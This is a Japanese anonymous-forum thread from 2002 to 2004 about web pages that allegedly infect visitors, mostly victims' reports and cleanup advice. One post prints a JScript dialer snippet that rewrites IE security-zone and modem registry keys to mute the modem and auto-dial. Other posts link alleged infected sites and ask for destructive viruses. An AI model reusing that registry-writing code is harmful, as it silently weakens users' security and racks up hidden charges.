リンク先を開いただけで感染するってわけじゃないんでしょ?
238 :
名無しさん@お腹いっぱい。 :02/05/01 23:24
(*゚ー゚)イヤデス
242 :
名無しさん@お腹いっぱい。 :02/05/02 00:08
>>243 教えてくれてありがとう
お気に入りとスタートページは直しました
明日ウイルスバスター買ってきます
| |ヽ@∈ |‘ ) ジー ⊂ |
あぼーん
247 :
名無しさん@お腹いっぱい。 :02/05/14 18:53
248 :
名無しさん@お腹いっぱい。 :02/05/14 20:03
>>248 ホント!!
お疲れ!! 志んんでくれ!
251 :
名無しさん@お腹いっぱい。 :02/06/10 02:25
>>251 それはウィルスではなくてQ2では?
調べてみて。
253 :
名無しさん@お腹いっぱい。 :02/06/17 00:24
255 :
名無しさん@お腹いっぱい。 :02/06/17 02:36
>>251 JS.Exception.Exploit
↑
こんなん仕掛けられてました。
すごくない。
259 :
ひみつの検疫さん :2024/12/22(日) 17:17:23 ID:MarkedRes
汚染を除去しました。
あ、まちがい
oi
263 :
名無しさん@お腹いっぱい。 :02/07/06 16:34
www.myparty.yahoo.com ここダイジョウブですか?? 心配なので開けません・・・
264 :
名無しさん@お腹いっぱい。 :02/07/06 16:50
↑マジ教えて!!
>>263 Yahoo! News - Document Not Found
だってさ。大丈夫だよ。
267 :
名無しさん@お腹いっぱい。 :02/07/06 17:08
ありがとうございました!!
268 :
名無しさん@お腹いっぱい。 :02/07/11 02:42
あぼーん
271 :
名無しさん@お腹いっぱい。 :02/07/11 13:07
最強のハッカーで有名な『ヒゲ』とはぼくのことです
(^∀^)ゲラゲラ
crashmeは?
276 :
名無しさん@お腹いっぱい。 :02/07/12 18:14
277 :
名無しさん@お腹いっぱい。 :02/07/13 02:29
感想もクソも・・・何も起きないけど Proxomitron+JSとActiveXオフなだけだけど
>>277 JSオフ、画像オフなので真っ白。とてもつまらない。
どうなんでしょうって、そんなの自分でソース見ればいいだろ それともネタ提供か? jisウィルスとか、ウイバスとかなかなか斬新な言語使ってらっしゃるようだが これじゃ逆に厨房でもひっかからないような気がするがw
>>281 すいません
一応ソースは見てみましたが
なにぶんウイルスの事はあまり知らないんで・・・
つい何とはなしにクリックしてしまったもので・・・
283 :
名無しさん@お腹いっぱい。 :02/07/13 07:10
洋楽イタみてたら、ノートン先生登場「感染しました」とのこと。 internet temporary fileが感染、love lettertとか書いてあった。 削除したが、誤作動それともほんとにウイルス?
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\1004", 00,"REG_DWORD"); Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Dial","M0"); Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Off","M1"); Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\1","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr "); // Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\2","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr "); // Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\3","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr "); // Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\0","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr "); // Shl.RegWrite("HKCU\\RemoteAccess\\Default","dialup01"); // Shl.RegWrite("HKCU\\RemoteAccess\\InternetProfile","dialup01"); Shl.RegWrite("HKCU\\RemoteAccess\\DialUI", 00000007,"REG_BINARY"); // Shl.RegWrite("HKCU\\RemoteAccess\\Profile\\dialup01\\AutoConnect", 01,"REG_DWORD");
286 :
名無しさん@お腹いっぱい。 :02/08/31 13:58
ラュdォRル描\YvΤuァ・・⊂・;kRエ{ 、C",ルhZ+~>$゙・ティ・リ・ミ・ト・メ・罧{ラ」・ク'イ・O J珥Eカ・・,訃`」:FィマQ(ッェ刈k.・ゥDyirオュRNサ6・チv袙・s~溜ワイネ+j毯チMtE ミ90(Uテ(ヌィ》ロヒ「ロaovRー焔摧ャ・cT?Wk%「ゥtb>・ィ妥O字・ソrキ;@呈ス9z゙綉亳x7メテ 振鑽�淞イ・・、、&h@・豆o・カ・ハサ陸),豌ーVx]*Gラ、2氈ニ9�∧鮭*・sN・0ax�ツケァ・ハ- $�・ソ<メB$┝kmヌЪヤDモRXコBァkbヨ.マホト}&~ウ鼻>$・ヲチリQトd{&タ・}マnKノnヨ" 'ネ{ンP・・1瑰靡・モケモI:~b;F;ェエ[]!ッaEum,・ヘ・粱ア・慴1タpx�8ッレ`b fノフ�`8)・・・! ト・・*o'Hロホャ耆・サG・`Ct鵜ルgmサツ・ョ{h・aIキ3e[c`レオ・タ垳庭mZ・:歟/ヨ・0、 フp3刪]ハ�\ヲ啾ュ肌u+WMNリヤ躪シ� 捷0`w・.Qャ症レモW[Vモ-iLoヨ!蠎lィニキ濕ρト� ェ忘堺-!・+pスチjC・羽ケy・メt・9ICo・鍛ュ�テ冂ェnリ・棄Z[,{�簍ユ@ノニ~;Iэマ6ナ 備・・K鱆サ・#e・畩;2&ルィ・<蚤・楔9+・B@"ォ'B・WbqルPLー罌�闔・レFムァc3ナ#b5bjモ_ rノ・=*フ�・|2Fz」飩2ト穿・%�チε 蒂ォー/ィ)ェt<エエRッオx奔sョムツ9城R6Sa波。サ8卻 b、ェX+EシサアWyシc衽ノ5タラ$c-}カqュヘ珎B敢剩~%厘rイ・2・・・q揺-A賣tニ4\Tィ)%・ Δk薪-ァ=ク�鷹u 1・「・ィdJ|nレミ、b�稠A]。Bm)ホ・ー枌X-$簑ノ``キk )慫ヌソO・mチm;D
あぼーん
>>287 ホットメールにウイルス送信依頼かよ(プ
あぼーん
あぼーん
(´-`).。oO(誰が何をつくれんだろう中途半端な荒らしだなぁ…)
(´-`).。oO(さりげなく私怨してる奴は何なんだろう…)
295 :
名無しさん@お腹いっぱい。 :02/09/15 23:55
>>292 どうせ開いただけで飛んじゃう
やつとか(settimeoutでopen
させる)をソースに書くんだろ。
簡単だモンな。2.3行だよ。
296 :
名無しさん@お腹いっぱい。 :02/09/20 08:37
あぼーん
うわっ!このすれがそーじゃねーか!! かかっちまった。
301 :
名無しさん@お腹いっぱい。 :02/09/21 23:13
>>298 Shl.RegWriteでレジ書き換えか
脳トンあたまいいからなー
JSもう限界、VBSの面白いコード
作れる人いるかな、、、
302 :
名無しさん@お腹いっぱい。 :02/09/22 22:00
>
>>302 ...IEの韓国語サポートダウソになんの技術がいると?
304 :
名無しさん@お腹いっぱい。 :02/09/22 22:22
>>303 ついていた文章はつぎのような文章だった。
ノートンがloveなんとかウィルスを検出した
Hi its me again, Lisa..... sorry my site was down, but i fixed it just for you.
I really want you to see me on my web cam live, i am usually online.
come check me out..............
-lisa
xoxo
305 :
名無しさん@お腹いっぱい。 :02/09/22 22:25
>>306 Ad-Awareでも使ったらどうっしょか。
使ったんですが、これだけはどうしても発見できないんです。 エロサイトで仕込まれたのは間違いないと思われるんですが(鬱
>>308 Spybotとか使うって手もあると思いまするが。
何をインスコして、もしくは何をしてからそうなったんすか?
ありきたりな回答なんですが。
MeやXPならシステムの復元で、多分回復しまする。
Spybotでうじゃうじゃ怪しげなのが出てきました。 Ad-Awareで発見できないやつって結構多いんですね。 サンクス。
311 :
名無しさん@お腹いっぱい。 :02/10/03 21:16
>>308 検出されたファイル名が知りたかった。。。。。
君が書き込めば、誰か新たな被害者が出た時にGoogle検索すると、このスレがヒットするのに。
もったいないなぁ。。。。。。
今度ははっきりと、「結果報告希望!」って書いてみまする。
315 :
名無しさん@お腹いっぱい。 :02/10/10 22:37
あぼーん
317 :
名無しさん@お腹いっぱい。 :02/10/11 18:15
>>316 警視庁にSENDMAILでいたずらメールが送信されちゃうんじゃない?
エログロワッショイ!! \\ ブラクラワッショイ!! // + + \\ ウイルスワッショイ!!/+ + . + /■\ /■\ /■\ + (Φ_Φ∩(= ゚仝゚∩ (;´〜`) + (( (つ ノ(つ 丿(つ つ )) + ヽ ( ノ ( ヽノ ) ) ) (_)し' し(_) (_)_)
あぼーん
あぼーん
323 :
名無しさん@お腹いっぱい。 :02/11/23 23:35
かんせーん
324 :
名無しさん@お腹いっぱい。 :02/12/27 04:46
携帯に感染するウイルスってあるの? ないよね・・・ ははは・・・
あぼーん
あぼーん
(^^)
328 :
名無しさん@お腹いっぱい。 :03/01/31 22:58
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz z
>>330 IEが古くて、Active X全開じゃなきゃ喰らわないよん。
修正。 Java VMのバージョンに依存。
あぼーん
最小化のボタンが0 最大化のボタンが2 閉じるボタンが r 体験版のソフトで調べたら感染してますって出たよ 直せないから隔離してますって言われたけど、怖くなったから 感染したファイル自分で削除してしまいました 削除しても、まったく意味ないことに気づいた今日この頃 もう一度感染して、ウイルス削除ソフト使えばよいのですか? 教えてくださいお願いします
335 :
名無しさん@お腹いっぱい。 :03/02/16 17:34
>>334 ノートンインターネットセキュリティを買う
↓
OSを再インストールする
↓
ノートンをインストールする
これが普通だと思います
質問スレをのぞいてみたら同じような症状の方がいて その方にアドバイスしている方もいました その方法を試してみようと思います お騒がせしました
338 :
名無しさん@お腹いっぱい。 :03/02/17 23:50
げは!
339 :
マジレスお願いします :03/02/19 01:26
340 :
名無しさん@お腹いっぱい。 :03/02/22 01:25
>>1 聞いただけで感染するわきゃないだろが。ヴォケが!
342 :
名無しさん@お腹いっぱい。 :03/02/25 23:10
もっとすげーの貼ってくれ!
343 :
名無しさん@お腹いっぱい。 :03/02/26 15:37
kusosure agenna!
あぼーん
>>345 つーか、hotmailは受信時にウイルスチェックするし。
Klezが送信者を偽装してるんだろ。
347 :
名無しさん@お腹いっぱい。 :03/03/02 21:03
JAVAスクリプト使ってるんですです・・
>>339
あぼーん
349 :
名無しさん@お腹いっぱい。 :03/03/09 03:01
あげる罠
350 :
名無しさん@お腹いっぱい。 :03/03/10 09:19
age
351 :
名無しさん@お腹いっぱい。 :03/03/13 14:42
(^^)
∧_∧ ( ^^ )< ぬるぽ(^^)
354 :
pona- :03/04/22 21:16
メール送るだけで発動するウイルス教えてください
この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、 様々なネット上の危険からの防御法や対策を語りあうための板です。 掲示板の荒らし方や侵入の方法、メールボムの送り方等、 攻撃方法の質問はご遠慮下さい。 2ちゃんねるでは荒らし依頼は出来ません。 また、この板ではアタック依頼は受け付けません。 攻撃依頼を見かけた方は、放置してください。 ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。
356 :
名無しさん@お腹いっぱい。 :03/04/25 13:51
∧_∧ ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。 =〔~∪ ̄ ̄〕 = ◎――◎ 山崎渉
1・ケ 1・セ J・エ 2・チ 2・シ ?・ネ ?・その他
359 :
名無しさん@お腹いっぱい。 :03/06/02 08:36
あのー happy99とかいてあるものをクリックしたら 画面が真っ赤になってしまいました。。 スキャンしたら検出されなかったのですが。 感染しているでしょうか。。
360 :
名無しさん@お腹いっぱい。 :03/06/03 21:07
あぼーん
happy99.exeか? 見た事あるが・・いかにもウイルスっぽい名前じゃん。 どうしてよく分かりもしないファイルを安易に実行するのかなあ・・。 まるで何でもすぐに口に入れてしまう触覚の発達してない赤ん坊みたいだな(藁
364 :
名無しさん@お腹いっぱい。 :03/06/08 15:13
365 :
名無しさん@お腹いっぱい。 :03/06/08 20:32
ttp://www2.strangeworld.org/gazou/view.cgi/100319_2.jpg?f=100325_2.jpg 上記urlをコピペしてブラクラチェッカーにかけようとしたらギコナビのプレビュー機能が働いちゃって
前に参照した画像がちらっと見えたと思ったらノートン先生の警告。
Js.Torojan.WindowBombだって。
まだ感染場所は検索してないけど、以前もいつ感染したかわからないウィルス(Trojanなんとか)が
あって、感染場所はギコナビフォルダとtemporaly internetfilesだった。
そのときのtempfileのurlにstrangeworldとかsahraとかいう文字列があった。
たしかノートン先生がVBSのソースが書かれているだけで警報鳴らしまくってた頃、tempofileは実
行できないから気にしなくてよいとか書いてあったような気がするので該当ファイルを削除して終わりにしたんだけど・・・
正直トロイが仕掛けられたんじゃないかと不安になる。
jpg見ただけで感染するウィルスってあるんでしょうか?
367 :
名無しさん@お腹いっぱい。 :03/06/08 20:38
>>366 まじっすか。じゃあ早速システムスキャンを。
一時間以上かかるのでまんどくさいが。
ちなみにこの板では鑑定はやらない。
今チェック終わりました。 スレ違いスマソ。
372 :
名無しさん@お腹いっぱい。 :03/07/06 14:46
あげ
373 :
名無しさん@お腹いっぱい。 :03/07/06 15:12
スレのタイトルと
>>1 さんの発言内容が一致してないように見える
のは私だけでしょうか。
あぼーん
あぼーん
あぼーん
しぽーん
おぽーん
380 :
名無しさん@お腹いっぱい。 :03/07/07 12:02
あぼーん
382 :
名無しさん@お腹いっぱい。 :03/07/07 13:17
再起動するたびに次に立ち上げるときに必ずHPが
http://revolto.da.ru/ に設定されていてPCがクラッシュして何が原因なのかさっぱりわからないんですけど…(鬱
スパイウエアとウィルスはすべて排除してはいるんですが…
( ´_ゝ`)フーン
>>382 FWは?アンチウイルス最新定義でやってないでしょ。
385 :
名無しさん@お腹いっぱい。 :03/07/08 00:01
387 :
名無しさん@お腹いっぱい。 :03/07/08 06:20
388 :
名無しさん@お腹いっぱい。 :03/07/08 07:28
389 :
名無しさん@お腹いっぱい。 :03/07/09 07:48
390 :
(;´Д`) :03/07/09 08:16
393 :
名無しさん@お腹いっぱい。 :03/07/12 14:23
>>393 感染サイト?リンクはhとか抜いとこうよ
REDLOFってひょんといるんだよね
あぼーん
__∧_∧_ |( ^^ )| <寝るぽ(^^) |\⌒⌒⌒\ \ |⌒⌒⌒~| 山崎渉 ~ ̄ ̄ ̄ ̄
__∧_∧_ |( ^^ )| <ぬるぽ(^^) |\⌒⌒⌒\ \ |⌒⌒⌒~| ~ ̄ ̄ ̄ ̄
399 :
名無しさん@お腹いっぱい。 :03/07/23 10:03
レベルの低い質問ですみません。 Win98、OutlookExpress5でウィルスメールを カスタマーセンターの指示通り、転送しようとしたら 自動開封やプレビューを切ってあったにもかかわらず 開封され、KLEZ_Hに感染してしまいました。 OutlookExpress5では、転送しようとすると 開封してしまうのでしょうか? また、開封せずに転送する方法はないのでしょうか? どうぞよろしくお願いします。
400 :
名無しさん@お腹いっぱい。 :03/07/23 18:42
(σ・∀・)σ400ゲッツ!!
403 :
名無しさん@お腹いっぱい。 :03/07/25 15:35
404 :
名無しさん@お腹いっぱい。 :03/07/25 23:13
このスレをクリックする時ドキドキした。
406 :
名無しさん@お腹いっぱい。 :03/07/27 10:02
age
∧_∧ ∧_∧ ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。 =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕 = ◎――――――◎ 山崎渉&ぼるじょあ
408 :
名無しさん@お腹いっぱい。 :03/08/13 04:07
(⌒V⌒) │ ^ ^ │<これからも僕を応援して下さいね(^^)。 ⊂| |つ (_)(_) 山崎パン
410 :
名無しさん@お腹いっぱい。 :03/08/24 01:35
保守あげ
411 :
名無しさん@お腹いっぱい。 :03/08/30 00:45
412 :
名無しさん@お腹いっぱい。 :03/08/30 11:24
413 :
名無しさん@お腹いっぱい。 :03/09/03 22:00
dhfdg
日付変わって 昨日は開いただけでfusianasanカキコをしてしまうトラップが大流行だったようで。
419 :
名無しさん@お腹いっぱい。 :03/09/09 19:01
421 :
名無しさん@お腹いっぱい。 :03/10/22 23:23
http://66.7.65.90/sou/bbs/ これとある掲示板にあって、開くつもりは本当に全く無いのに間違えて開いちゃって
PCがおかしくなりました。ウイルスなんでしょうか?
症状としては、IEをWクリすると勝手にエロサイトに接続するように設定が変わってしまい
いくら直してもPCを起動すればまたエロサイトに接続するように設定されてしまいます
↑のサイトのせいかはわかりませんが、↑のサイトを開いてPCが変になってから
ウイルスバスターの体験版をDLして検索したら、TROJ_WINTRIM.Aとかいうウイルスが大量に
見つかりました。このウイルスの駆除自体は終わったんですが、未だに強制エロサイトの
設定は改善されていません。
PCのことは初心者なので、どうか直し方を教えていただきたいのですが・・。
422 :
(・3・) :03/10/22 23:55
age
>>422 (・3・) アルェー ボクの顔勝手に使わないでYO
421 諦めて再インストールじゃy
マルチはパソコンを窓から投げ捨てろ
427 :
名無しさん@お腹いっぱい。 :03/10/23 21:19
428 :
oおしえてよん :03/10/23 23:13
429 :
oおしえてよん :03/10/23 23:22
ぜひ教えて下さいませ。
430 :
名無しさん@お腹いっぱい。 :03/10/26 18:41
ブラクラ・プリクラ
>422 名前: (・3・) 投稿日: 03/10/22 23:55 >age >422 名前: (・3・) 投稿日: 03/10/22 23:55 >age >422 名前: (・3・) 投稿日: 03/10/22 23:55 >age >422 名前: (・3・) 投稿日: 03/10/22 23:55 >age
433 :
名無しさん@お腹いっぱい。 :03/10/26 21:26
ブラクラってなによ?
ボンクラってなによ?
431のアホですが、
>>431 のレス訂正
私も
>>422 さんと全く同じ症状です。
ではなく
私も
>>421 さんと全く同じ症状です。
でした。
だれかアホの俺の相談にのってください。たのんます
>>435 SPYBOT入れてスキャンしてみなされ。
なお、定義ファイルを更新しておくこと。
>>434 シマンテックのホームページでレジストリのいじり方まで教えてくれるから
行ってみれば?
了解しました
439 :
名無しさん@お腹いっぱい。 :03/11/01 11:36
Internet Explorer開いたら、いきなりアダルトページ。 設定しなおしても、再起動するとアダルトページ。 ウイルスチェックしても1つ見つからない。絶対感染してますよね?
440 :
名無しさん@お腹いっぱい。 :03/11/01 11:37
>>439 もしかしてTHE HUN'S イエローなんたらって奴ですか?
442 :
名無しさん@お腹いっぱい。 :03/11/02 20:05
444 :
名無しさん@お腹いっぱい。 :03/11/02 20:12
>>443 画像なんですか・・・??
IPぶっこ抜きかと思いましたが移動します。
ありがdです。
|ノシ
>>444 画像って言うより、鑑定依頼はそっちでやってねって事。
448 :
名無しさん@お腹いっぱい。 :03/11/13 23:31
ウイルスの情報を一つ知りたいんですが、 ページ開いただけで感染し、勝手に接続を切られてしまい、 次から接続しようとしても接続ダイアログが出ないですぐ接続中になる。 ある程度時間たってからユーザー名とパスワードを入力するダイアログが 出てくるんで入力すると、モデムが使用中と出て繋がらない。 繋がっても接続インジケータがトレイに出てこない。 この様な症状のウイルスに感染したので、仕方なく元にもどすために 別のハードディスクにシステムをインストールしてそこから起動するという 方法をとったんですが、まだ不安なのでこのウイルスの情報がほしいです。 感染するとxtreamというプログラムが現れ、削除してもIEを起動するたび なぜか復活してホームに常駐してしまいます。 システムの再インストールをしても同じ。 それで上記の方法をとったわけですが・・・ xtreamという名前のウイルスではないんでしょうか? だとしたらどういう仕組みのウイルスなのか・・・ もしかしてユーザー情報を盗まれてしまって悪用されてたりしないかと思うと 不安なのです。 教えて下さい、お願い致します。
>>448 それはウイルスじゃないでしょ。ダイヤルアップ回線で、国際電話接続してぼろもうけする商売。
スパイウェア発見ソフトで駆除できる。
>>448 >システムの再インストールをしても同じ。
フォーマットしていないでしょう?
上書きか、修復インストールしたと見た。
新規にインストールすれば、そのようなことは起きない。
(・3・) アルェー ボクの顔勝手に使わないでYO
452 :
名無しさん@お腹いっぱい。 :03/11/14 00:45
(・3・) アルェー ボクの顔勝手に使わないでYO
>>450 既に前のシステムがあったHDの方はフォーマットしています。
けど国際電話にむりやり繋げられた時間はどの位なんでしょか・・・
請求書にばかでかい金額のが書かれてたらどうしよう・・・こわいよー
>>453 パソコンに、電話線も繋いであるような環境だと、非常にまずい。
繋いでいないのなら、気にしなくていい。どうせ繋がらないのだから。
DSL環境じゃないのかな?
>>453 ちなみに請求は、接続されていた国際電話会社の方からきます。
5社全てのサービス窓口に、電話で確認した方が安心できると思いますよ。
456 :
名無しさん@お腹いっぱい。 :03/11/14 20:26
>>453 ダイヤルアップで通信料金を支払うタイプです、常時接続じゃあない。
電話線を繋がないと通信そのものができないと思ってましたが
違うんでしょうか?
458 :
名無さん@お腹いっぱい。 :03/11/16 09:12
お揚げさんw
460 :
名無しさん@お腹いっぱい。 :03/11/19 23:53
>>459 レスありがとうございます。
リンクに従って調べたところ、ダイアルアップチェッカーが必要ということが
わかりました。
既にスパイウェア除去ソフトをダウンロードしてるので
大丈夫だと思ったのですが、なんとそのダイアルアップチェッカーは
自分が持ってるプロパイダCD-ROMに付属で入ってたことがわかって
ぎゃふんです。
とりあえずインストールして起動してます。
461 :
名無しさん@お腹いっぱい。 :03/11/24 20:59
462 :
名無しさん@お腹いっぱい。 :03/12/08 15:44
あぼーん
hotmailでウイルス送信依頼する奴のほうが間抜けだよな。
あぼーん
マジレスすると、hotmailには受信時に自動でマカフィーのウイルスチェックが入る。
あぼーん
468 :
名無しさん@お腹いっぱい。 :03/12/14 06:58
22
>>421 さんと同じ症状なんですが、こうなった場合どうすればいいんですか??
ウィルスの駆除も全て終ったのに、いまだにエロサイトにとばされたり
デスクトップに勝手に居座ったりしています。
消しても消してもダメで・・・
>>431 さんのような症状にも似てるんですが
「RAW SEX」というのは出て来ませんでした
こういう事態に初めてあったので、どうすればいいのか良く分からなくて
レスとかずっと見たんですが
根本的な解決方法がよく分からなくて
誰か簡単に教えてください。。。
473 :
名無しさん@お腹いっぱい。 :04/03/27 01:54
ウイウスに感染したみたいです↓eが沢山… eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeええええええこんな状態なんdすが えばせええうたええええええええええええええ なんとかならないでしょうか? ウイルスバスター購入しないとだめですか?
474 :
名無しさん@お腹いっぱい。 :04/03/28 22:20
復讐とか探偵、別れさせ屋とか書いてあるblacklistっていう怪しげな ページにぜんぜん関係ないところをみてたのにふいに踏んでしまった。 ホームの設定がblacklistに書き換えられてしまった。気持ちわるかった 設定しなおしたら直ったけど。ウイルスバスターいれたけど、効果あるんかな。 そんなページがあるなんて知らなかったよ。
age
477 :
名無しさん@お腹いっぱい。 :04/04/02 23:55
ある女性の顔が夢にまで出てくるようになってしまったのですが、 何らかのウィルスに感染したのでしょうか? 症状としては、胸が苦しくなり、食欲が無くなり、他の事に集中できなくなります。 夜も中々寝付けません。 人生これからという大切な時期、非情に切実な問題です。 情報お待ちしています。 追伸)その女性は醜いお婆さんです。
479 :
(・∀・)チンコー :04/04/03 21:06
マンコー
480 :
名無しさん@お腹いっぱい。 :04/04/05 10:44
481 :
名無しさん@お腹いっぱい。 :04/04/06 00:39
482 :
名無しさん@お腹いっぱい。 :04/04/15 01:00
>>477 ウイルスとスパイウエアの複合感染
トロイがトロイを呼び、なかなか駆除できない。
今困ってるところ。
483 :
名無しさん@お腹いっぱい。 :04/04/15 01:18
なぜかこの板更新するたびに ノートン先生がラブレター注意と申されている
datファイルの誤警告だろ
485 :
名無しさん@お腹いっぱい。 :04/06/19 17:19
トロイとスパイウエアの複合感染に困っています。 ノートンで駆除しても、ネットにつなぐとまた来ます・・・ 感染すると何かを発信しまくって、 ネットが出来なくなったり、PCが不安定になったりします。 たすけて・・・
487 :
名無しさん@お腹いっぱい。 :04/06/20 17:42
489 :
名無しさん@お腹いっぱい。 :04/06/20 18:04
>>485 怪しいサイトに行かないようにしましょう。
ブラウザはオペラなどを使いましょう。
>>487 VIRUS_NAME: Exploit.HTML.Mht
VIRUS_NAME: Java/OpenConnection.F
VIRUS_NAME: Java/Needy.D
VIRUS_NAME: TrojanDropper.VBS.Zerolin
VIRUS_NAME: TrojanDownloader.JS.Small.d
これらのウイルスが漏れなく付いてきます。アクセスされる方は自己責任で…
492 :
名無しさん@お腹いっぱい。 :04/06/20 21:05
488さん、487はただのアドレスですか?怖くて行けないのですが・・・・。
493 :
名無しさん@お腹いっぱい。 :04/06/20 21:07
487です。491さん、ありがとう。今から駆除します。
496 :
名無しさん@お腹いっぱい。 :04/06/21 00:47
490=495はうざい!!
Operaでも感染するページってある?
>>498 そのページにはウィルスはいないが、リンク先はウィルスだらけ。
500ゲット
501 :
名無しさん@お腹いっぱい。 :04/06/30 18:14
tes
502 :
名無しさん@お腹いっぱい。 :04/06/30 20:30
あぼーんばっかでつね NGワードリスト貼ってくれる神キボンヌ
504 :
名無しさん@お腹いっぱい。 :04/07/01 00:18
505 :
名無しさん@お腹いっぱい。 :04/07/01 00:38
どうしても聞いただけでウイルスに感染するページ に見える
507 :
名無しさん@お腹いっぱい。 :04/07/06 01:01
508 :
名無しさん@お腹いっぱい。 :04/07/06 23:12
あぼーん
>>510 本当だ。トロイの木馬だね。
VIRUS_NAME: TrojanDownloader.JS.Small.d
512 :
名無しさん@お腹いっぱい。 :04/07/07 22:34
513 :
名無しさん@お腹いっぱい。 :04/07/07 22:42
>>512 うちのはVBS/Redlof.Aで反応した。
514 :
名無しさん@お腹いっぱい。 :04/07/07 22:45
>>510 やべ。オペラで開いちゃったけど大丈夫かな?
515 :
名無しさん@お腹いっぱい。 :04/07/07 22:49
518 :
名無しさん@お腹いっぱい。 :04/07/07 23:11
テンポラリってなんですか? /odekake1.htmlに直リンで飛んだだけでは2つは出ないけど /odekake.htmlからリンクしていくと2つ出るのはどうして?
520 :
名無しさん@お腹いっぱい。 :04/07/07 23:16
みんなチャレンジャーだね
522 :
名無しさん@お腹いっぱい。 :04/07/08 20:46
>>521 せっかくアンチウイルスソフト入れてるんだから、
たまには動作チェックしないと(w
homepage3.nifty.com/tef-room/virus/securepedo-1.html ページを開いた途端にMacAfeeが反応してトロイの木馬を検出した よりによって「ウィルス・トロイ・スパイウェア」対策のサイトだというのに(苦笑) 単なる誤動作なら良いんだけど
試すのならEICARテストで十分かと・・・漏れは怖くて人柱なんてできねー
>>527 やってみたよ。
eicar.comとeicar.com.txtは反応したけど、
eicar_com.zipとeicarcom2.zipは反応しなかった。
バスターだが eicar.com.txt に無反応・・・orz
>>528 DLしたファイルをスキャンしたら反応した。
DL時には無反応だった。
531 :
名無しさん@お腹いっぱい。 :04/07/09 08:28
今ギコナビでWindows板のupdateしたときに上げるスレ開いたら、 ラブレター入ってきた。ノートンが駆除してくれたけど。 その後他のスレ開こうとしたら、いつまで経ってもスレ取得できなくて、 一度ギコナビ終了して他のスレを何個か開いたけど異常なし。 もう一度updateスレ開いたら、やっぱりラブレターが。その後もやっぱりスレ取得できず。 IEで開いても何もなかった。なんで?
>>531 それ以前の問題としてノートン使ってるなら2ちゃんのログ除外の設定くらいしとけや。
除外の仕方くらい分かるよね?設定すれば君のような間抜けな質問はできない筈だがな。
あ〜あ、531苛めるからすねてどっかいっちゃったよ・・・
書き込んだ後仕事行って今帰ってきた。 何か凄い恥ずかしい事しちゃったみたい。スレ汚しスマソ。 >532、>534 こんな馬鹿に教えてくれてありがとう! 今から勉強してくるよ。
>>527 AntiVir eicar.comしか反応しなかったw
538 :
名無しさん@お腹いっぱい。 :04/07/10 18:57
どなたか教えて下さい。
>>498 のサイト、某板に貼られていたのを踏んでしまったんですが、
ActiveXコントロールのインストールダイアログで「いいえ」を選択し、
バスター2004が隔離したファイルを削除しただけでは、
まだ何かに感染していることがあるのでしょうか?
ブラウザはIE、OSはXPproバスターのウイルスパターンは本日の最新版ですた。
踏んだのも今日です
>>539 それで解決。問題なし。不安ならスキャンするべし。
544 :
名無しさん@お腹いっぱい。 :04/07/14 22:14
>>544 VBS/Redlof.Aが検知。危険。
546 :
名無しさん@お腹いっぱい。 :04/07/15 03:33
ここはウィルスの交換所でつか? 直リンばかりで、恥ずかしくないの?
AVソフト入れてないんだけどactiveXを手動でインストールにしていいえ選択しておけば やばいページ開いても感染しない?
>547 んなこたぁない
549 :
名無しさん@お腹いっぱい。 :04/07/15 11:00
Windowsアップデートをしておけば、あとは質問にいいえで大丈夫だろ。 入ってきようがないではないか。
java有効にしていると即感染するページってのはあるんですか?
》550 あるよ。 特に金髪美女のヌードが載っているのは、典型的な例。
そのファイル、削除されてない?
302 FOUNDと出てくるみたいだが?
あ、違う。The document has moved Here.だ。
559 :
名無しさん@お腹いっぱい。 :04/07/16 07:53
>552 むかつき板。埋めたが削除
ミ ヽ( 'A`)ノ \ \ ○○ 毒人形さんがなんとなく現れた
いまこのスレ開いた瞬間にウイルス警告来て焦った。 Js.Trojan.WindowBomb _| ̄|○ 鬱だ折ろう...
562 :
名無しさん@お腹いっぱい。 :04/07/18 10:43
HDDを消去するウィルスサイトはどこですか?(生きているやつ)
あぼーん
あぼーん
あぼーん
567 :
名無しさん@お腹いっぱい。 :04/07/20 20:41
>>586 本当だわ!
ブラクラやばいチェックでAVGが反応・・・・
そのレスの所で自作自演するつもりなのだろうw
インターネットオプションでセキュリティを「強」に
572 :
名無しさん@お腹いっぱい。 :04/07/23 17:31
573 :
名無しさん@お腹いっぱい。 :04/07/23 19:16
